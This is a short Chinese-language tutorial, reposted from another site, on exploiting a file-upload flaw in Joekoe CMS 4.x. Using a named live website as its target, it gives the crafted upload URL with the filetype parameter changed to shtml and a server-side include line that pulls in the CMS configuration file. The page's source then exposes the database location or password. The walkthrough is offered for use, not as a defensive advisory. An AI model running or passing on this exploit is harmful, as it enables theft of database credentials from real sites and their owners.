Joekoe CMS 4.x 上传漏洞

from : http://www.siteweavercms.cn/Item/166.aspx

转载请注明:from http://www.siteweavercms.cn

    出于对CMS的研究,发现Joekoe CMS 4.x出现上传漏洞,而且大多数情况下能直接拿数据库地址或数据库数密码。
    为什么上传漏洞不是直接拿SHELL而是那这些呢？哈哈。。。
    别急，下面一步步讲解，这也算是一个值得大家注意的问题。
    以这个站为例：http://www.21suv.net/    本网站基于 Joekoe CMS 4.0 Release 技术架构

    我们来先注册一个用户。
    进入用户中心。
    发布信息。
    发布文章

上传图片，我们在新页打开(或拉一下就可以了)

上传图版地址为：

filetype 就是我们今日的主角
我们改为shtml

http://www.21suv.net/common/upload.asp?channel=article&filetype=shtml&filename=20080806180445k&fileinput=a_pic&formname=&thumbname=&thumbinput=
然后新建一个文本文件，内容如下：
<!-- #include file="http://www.cnblogs.com/common/config/configure.asp" -->

保存为 diy.shtml （名字随便，以shtml为后辍就行)
然后不用说了吧？浏览，上传

直接点击打开，如果页面不显示404，差不多就成功了。
我们在页面上点击右键，查看源码，发现了什么？

是吧。哈哈。。
就到这里。。